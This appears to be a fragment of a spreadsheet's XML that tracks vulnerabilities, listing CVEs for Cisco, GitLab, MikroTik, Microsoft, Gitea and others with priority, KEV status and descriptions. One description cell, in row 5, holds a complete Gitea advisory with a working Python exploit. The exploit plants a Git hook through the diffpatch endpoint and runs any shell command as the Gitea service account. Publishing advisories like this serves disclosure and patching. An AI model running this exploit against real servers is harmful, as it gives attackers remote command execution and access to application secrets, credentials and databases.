        </is>
      </c>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr"/>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr"/>
      <c r="S14"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14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr"/>
      <c r="E15" s="5" t="inlineStr"/>
      <c r="F15" s="5" t="inlineStr"/>
      <c r="G15" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H15" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I15" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr"/>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr"/>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr"/>
      <c r="E16" s="5" t="inlineStr"/>
      <c r="F16" s="5" t="inlineStr"/>
      <c r="G16" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H16" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I16" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr"/>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr"/>
      <c r="S16"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16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="D17" s="5" t="inlineStr"/>
      <c r="E17" s="5" t="inlineStr"/>
      <c r="F17" s="5" t="inlineStr"/>
      <c r="G17" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H17" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I17" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr"/>
      <c r="P17" s="5" t="inlineStr"/>
      <c r="Q17" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="R17" s="5" t="inlineStr"/>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains an improper neutralization of argument delimiters in a command vulnerability which allows an attacker to change the trusted RouterOS policy mask, leading to privilege escalation.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86218</t>
        </is>
      </c>
      <c r="D18" s="5" t="inlineStr"/>
      <c r="E18" s="5" t="inlineStr"/>
      <c r="F18" s="5" t="inlineStr"/>
      <c r="G18" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H18" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I18" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr">
        <is>
          <t>n-able:n-central</t>
        </is>
      </c>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr"/>
      <c r="P18" s="5" t="inlineStr"/>
      <c r="Q18" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="R18" s="5" t="inlineStr"/>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>N-able N-central contains a static code injection vulnerability that could allow for pre-authentication remote code execution.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87886</t>
        </is>
      </c>
      <c r="D19" s="5" t="inlineStr"/>
      <c r="E19" s="5" t="inlineStr"/>
      <c r="F19" s="5" t="inlineStr"/>
      <c r="G19" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>KEV</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr"/>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R19" s="5" t="inlineStr"/>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T19"/>
  <conditionalFormatting sqref="E2:E1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08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CVE-2026-84869</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>7d616e1a-3288-43b1-a0dd-0a65d3e70a49</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>connectwise:screenconnect</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81963</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-60004</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr"/>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="n">
        <v>0.868</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>Go:gitea.dev</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>1.27.1</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr"/>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>### Summary
Gitea's `diffpatch` endpoint can be abused to install and execute a Git hook from repository-controlled content.
An attacker with ordinary write access to a repository can execute arbitrary shell commands as the Gitea OS user. With default open registration, an unauthenticated visitor can obtain the required write access by registering an account and creating a repository.
### Details
`services/repository/files/patch.go` applies attacker-controlled patches in a shared bare temporary clone:
```go
cmdApply := gitcmd.NewCommand("apply", "--index", "--recount", "--cached", "--binary")
if git.DefaultFeatures().CheckVersionAtLeast("2.32") {
    cmdApply.AddArguments("-3")
}
````
Submitting the same patch twice creates an add/add collision. Git's three-way fallback checks the indexed path out even though the operation is performed with `--cached`.
In a bare clone, the repository root is `$GIT_DIR`. As a result, an executable entry named:
```text
hooks/post-index-change
```
becomes a live Git hook.
Git invokes the hook while writing the index, allowing repository-controlled content to execute arbitrary commands as the Gitea service account.
The hook's return value is not propagated to the `diffpatch` response.
The attached PoC stores command output in Git objects and creates a branch containing the result, so no outbound connection is required. The result is fetched through authenticated smart HTTP.
### PoC
The supplied `gitea_diffpatch_rce_poc.py` uses an existing Gitea account. Run it against a test instance where the account can create a repository.
Set the account password:
```bash
export GITEA_PASSWORD='account-password'
```
Execute a command through the `diffpatch` chain:
```bash
python3 ./gitea_diffpatch_rce_poc.py \
  https://gitea.example \
  pocuser \
  'id; uname -srm; pwd'
```
The script:
* Creates an initialized private repository.
* Submits the same executable-hook patch twice.
* Fetches the result branch.
* Prints the command's combined stdout, stderr, and exit status.
* Prints the evidence repository, ref, and commit IDs to stderr.
Expected output resembles:
```text
uid=1000(git) gid=1000(git) groups=1000(git)
Linux ...
/data/gitea/tmp/...
[exit-status=0]
```
The trigger requires:
* Git 2.32 or newer.
* An enabled `diffpatch` route.
* A writable and executable temporary filesystem.
Open registration is required only for the no-prior-credentials attack path.
### Impact
This is remote command execution as the Gitea service account (`CWE-94`).
Depending on deployment isolation and the privileges of the Gitea OS user, successful exploitation may expose:
* `app.ini` and Gitea application secrets.
* Process environment secrets.
* Mounted repositories.
* Database credentials and database contents.
* OAuth and integration credentials.
* Other internal or externally reachable services.
With open registration enabled, the attack can be performed by an unauthenticated visitor after registering a normal account and creating a repository.
&lt;img width="928" height="687" alt="Screenshot 2026-07-25 at 14 45 44" src="https://github.com/user-attachments/assets/e7ce9fe7-bcab-4539-82fc-14c3856bda1c" /&gt;
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Gitea RCE PoC – authorized testing only.
"""
from __future__ import annotations
import argparse
import base64
import getpass
import hashlib
import json
import os
from pathlib import Path
import secrets
import shlex
import shutil
import subprocess
import sys
import tempfile
from typing import Any
import urllib.error
import urllib.parse
import urllib.request
TIMEOUT    = 30.0
USER_AGENT = "gitea-rce-poc/2.0"
_RST  = "\033[0m"
_DIM  = "\033[2m"
_GRN  = "\033[38;5;46m"     # bright green
_RED  = "\033[31m"           # red for errors
def _g(t: str) -&gt; str: return f"{_GRN}{t}{_RST}"
def _r(t: str) -&gt; str: return f"{_RED}{t}{_RST}"
def _d(t: str) -&gt; str: return f"{_DIM}{t}{_RST}"
def log_star(msg: str) -&gt; None: print(f"{_g('[*]')} {_d(msg)}")
def log_ok  (msg: str) -&gt; None: print(f"{_g('[+]')} {_g(msg)}")
def log_err (msg: str) -&gt; None: print(f"{_r('[-]')} {_r(msg)}")
_SEP = "  " + "═" * 44
BANNER = f"{_SEP}\n  GITEA  REMOTE CODE EXECUTION  POC\n{_SEP}"
def print_banner(url: str, version: str | None = None,
                 command: str | None = None) -&gt; None:
    print()
    for line in BANNER.splitlines():
        print(_g(line))
    print()
    ver = version or "unknown"
    print(_g("  " + "-" * 54))
    print(_g(f"  Target        : {url}"))
    print(_g(f"  Version       : {ver}"))
    if command:
        print(_g(f"  Command       : {command}"))
    print(_g("  " + "-" * 54))
    print()
class PocError(RuntimeError):
    pass
class GiteaClient:
    def __init__(self, base_url: str, username: str, password: str) -&gt; None:
        parsed = urllib.parse.urlsplit(base_url)
        if parsed.scheme not in {"http", "https"} or not parsed.netloc:
            raise PocError("URL must be an absolute http:// or https:// URL")
        if parsed.query or parsed.fragment:
            raise PocError("URL must not contain a query string or fragment")
        self.base_url = base_url.rstrip("/")
        self.username = username
        self.password = password
        encoded = base64.b64encode(
            f"{username}:{password}".encode()
        ).decode("ascii")
        self.authorization = f"Basic {encoded}"
    def api(
        self,
        method: str,
        path: str,
        payload: dict[str, Any] | None = None,
    ) -&gt; tuple[int, Any]:
        data = None
        if payload is not None:
            data = json.dumps(payload, separators=(",", ":")).encode()
        req = urllib.request.Request(
            self.base_url + path,
            data=data,
            method=method,
            headers={
                "Accept": "application/json",
                "Authorization": self.authorization,
                "Content-Type": "application/json",
                "User-Agent": USER_AGENT,
            },
        )
        try:
            with urllib.request.urlopen(req, timeout=TIMEOUT) as r:
                raw = r.read()
                return r.status, json.loads(raw) if raw else None
        except urllib.error.HTTPError as exc:
            body = exc.read().decode("utf-8", errors="replace")[:2_000]
            raise PocError(f"{method} {path} → HTTP {exc.code}: {body}") from exc
        except urllib.error.URLError as exc:
            raise PocError(f"{method} {path} failed: {exc.reason}") from exc
        except json.JSONDecodeError:
            raise PocError(f"{method} {path} returned invalid JSON")
def blob_oid(content: bytes) -&gt; str:
    return hashlib.sha1(
        f"blob {len(content)}\0".encode("ascii") + content
    ).hexdigest()
def build_hook(command: str, leak_ref: str) -&gt; bytes:
    qcmd = shlex.quote(command)
    qref = shlex.quote(f"refs/heads/{leak_ref}")
    return (
        "#!/bin/sh\n"
        'git_dir=$(git rev-parse --absolute-git-dir) || exit 1\n'
        'origin_objects=$(sed -n "1p" "$git_dir/objects/info/alternates") || exit 2\n'
        'case "$origin_objects" in\n'
        '  /*) ;;\n'
        '  *) origin_objects="$git_dir/objects/$origin_objects" ;;\n'
        "esac\n"
        'origin_git=${origin_objects%/objects}\n'
        '[ "$origin_git" != "$origin_objects" ] || exit 3\n'
        f"output_blob=$({{ /bin/sh -c {qcmd}; "
        'command_status=$?; printf "\\n[exit-status=%s]\\n" "$command_status"; } 2&gt;&amp;1 | '
        'git --git-dir="$origin_git" hash-object -w --stdin) || exit 4\n'
        'tree=$(printf "100644 blob %s\\toutput\\n" "$output_blob" | '
        'git --git-dir="$origin_git" mktree) || exit 5\n'
        'commit=$(printf "command output\\n" | '
        "GIT_AUTHOR_NAME=poc GIT_AUTHOR_EMAIL=poc@example.invalid "
        "GIT_COMMITTER_NAME=poc GIT_COMMITTER_EMAIL=poc@example.invalid "
        'git --git-dir="$origin_git" commit-tree "$tree") || exit 6\n'
        f'git --git-dir="$origin_git" update-ref {qref} "$commit" || exit 7\n'
        "exit 0\n"
    ).encode()
def build_patch(hook: bytes) -&gt; str:
    lc  = hook.count(b"\n")
    hdr = (
        "diff --git a/hooks/post-index-change b/hooks/post-index-change\n"
        "new file mode 100755\n"
        f"index {'0'*40}..{blob_oid(hook)}\n"
        "--- /dev/null\n"
        "+++ b/hooks/post-index-change\n"
        f"@@ -0,0 +1,{lc} @@\n"
    ).encode()
    return (hdr + b"".join(b"+" + l for l in hook.splitlines(keepends=True))).decode()
def run_git(git: str, arguments: list[str], env: dict[str, str]) -&gt; bytes:
    try:
        result = subprocess.run(
            [git, *arguments], env=env,
            stdin=subprocess.DEVNULL,
            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
            check=False, timeout=TIMEOUT,
        )
    except subprocess.TimeoutExpired as exc:
        raise PocError(f"git timed out after {TIMEOUT:g}s") from exc
    except OSError as exc:
        raise PocError(f"could not run git: {exc}") from exc
    if result.returncode != 0:
        err = result.stderr.decode("utf-8", errors="replace")[:2_000].strip()
        raise PocError(f"git exit {result.returncode}: {err}")
    return result.stdout
def fetch_output(git: str, client: GiteaClient,
                 owner: str, repo: str, leak_ref: str) -&gt; bytes:
    remote = (
        f"{client.base_url}/"
        f"{urllib.parse.quote(owner, safe='')}/"
        f"{urllib.parse.quote(repo, safe='')}.git"
    )
    with tempfile.TemporaryDirectory(prefix="gitea-poc-") as tmp:
        bare      = Path(tmp) / "fetch.git"
        auth_cfg  = Path(tmp) / "auth.config"
        fd = os.open(auth_cfg, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
        with os.fdopen(fd, "w", encoding="utf-8") as f:
            f.write(f"[http]\n\textraHeader = Authorization: {client.authorization}\n")
        env = {**os.environ, "GIT_TERMINAL_PROMPT": "0"}
        run_git(git, ["init", "--bare", "--quiet", str(bare)], env)
        run_git(git, [
            "-C", str(bare), "-c", f"include.path={auth_cfg}",
            "fetch", "--quiet", "--no-tags",
            remote, f"refs/heads/{leak_ref}",
        ], env)
        return run_git(git, ["-C", str(bare), "show", "FETCH_HEAD:output"], env)
def split_output(raw: bytes) -&gt; tuple[str, int | None]:
    text  = raw.decode("utf-8", errors="replace")
    lines = text.splitlines()
    status: int | None = None
    if lines:
        t = lines[-1].strip()
        if t.startswith("[exit-status=") and t.endswith("]"):
            try:    status = int(t[len("[exit-status="):-1])
            except ValueError: pass
            else:   lines.pop()
    return "\n".join(lines).rstrip("\n"), status
def parse_args() -&gt; argparse.Namespace:
    p = argparse.ArgumentParser(description="Gitea RCE PoC")
    p.add_argument("url",      help="Gitea base URL")
    p.add_argument("username", help="existing Gitea username")
    p.add_argument("command",  help="shell command to execute on target")
    return p.parse_args()
def main() -&gt; int:
    args = parse_args()
    if "\0" in args.command:
        raise PocError("command must not contain a NUL character")
    password = os.environ.get("GITEA_PASSWORD") or getpass.getpass(
        _g("[?]") + " password: "
    )
    if not password:
        raise PocError("password must not be empty")
    git = shutil.which("git")
    if git is None:
        raise PocError("git executable not found in PATH")
    client = GiteaClient(args.url, args.username, password)
    # version probe (pre-banner)
    log_star("probing target...")
    version: str | None = None
    try:
        r = urllib.request.Request(
            client.base_url + "/api/v1/version",
            headers={"Accept": "application/json", "User-Agent": USER_AGENT},
        )
        with urllib.request.urlopen(r, timeout=TIMEOUT) as resp:
            version = json.loads(resp.read()).get("version", "unknown")
    except Exception:
        version = "unknown"
    print_banner(client.base_url, version, args.command)
    log_star(f"target={client.base_url}  user={args.username}  cmd={args.command}")
    print()
    # step 1 – authenticate
    log_star("authenticating...")
    sc, acct = client.api("GET", "/api/v1/user")
    if sc != 200 or not isinstance(acct, dict):
        log_err("authentication failed"); raise PocError("auth failed")
    owner = acct.get("login")
    if not isinstance(owner, str) or not owner:
        log_err("no login in response"); raise PocError("no login")
    log_ok(f"logged in as {owner}  ({version})")
    # step 2 – create repo
    unique   = secrets.token_hex(5)
    repo     = f"test-repo-{unique}"
    leak_ref = f"output-{unique}"
    log_star("creating repository...")
    sc, _ = client.api("POST", "/api/v1/user/repos", {
        "name": repo, "private": True,
        "auto_init": True, "default_branch": "main",
        "object_format_name": "sha1",
    })
    if sc != 201:
        log_err("repo creation failed"); raise PocError("repo creation failed")
    log_ok(f"created repo {owner}/{repo}")
    # steps 3–4 – deliver payloads
    body = {
        "content": build_patch(build_hook(args.command, leak_ref)),
        "message": "initial commit",
        "branch": "main", "new_branch": "main",
    }
    ep = (
        f"/api/v1/repos/{urllib.parse.quote(owner, safe='')}/"
        f"{urllib.parse.quote(repo, safe='')}/diffpatch"
    )
    commits: list[str] = []
    for cycle in (1, 2):
        log_star(f"delivering payload {cycle}/2...")
        sc, resp = client.api("POST", ep, body)
        try:
            commit = resp["commit"]["sha"]
        except (KeyError, TypeError) as exc:
            log_err(f"payload {cycle}/2 rejected")
            raise PocError(f"cycle {cycle} no commit") from exc
        if sc != 201:
            log_err(f"payload {cycle}/2 failed")
            raise PocError(f"cycle {cycle} failed")
        commits.append(commit)
        log_ok(f"payload {cycle}/2 accepted  commit={commit[:16]}")
    # step 5 – retrieve output
    log_star("retrieving output...")
    output = fetch_output(git, client, owner, repo, leak_ref)
    log_ok("operation complete")
    # command output
    cmd_out, exit_status = split_output(output)
    print()
    log_ok(f"{args.command}:")
    print(_g("---"))
    if cmd_out:
        for line in cmd_out.splitlines():
            print(_g(line))
    else:
        print(_d("&lt;no output&gt;"))
    print(_g("---"))
    if exit_status == 0:
        log_ok(f"exit status: {exit_status}")
    elif exit_status is None:
        log_star("exit status: unknown")
    else:
        log_err(f"exit status: {exit_status}")
    return 0
if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except PocError as exc:
        log_err(str(exc))
        raise SystemExit(1) from None
```</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-60004</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44756</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
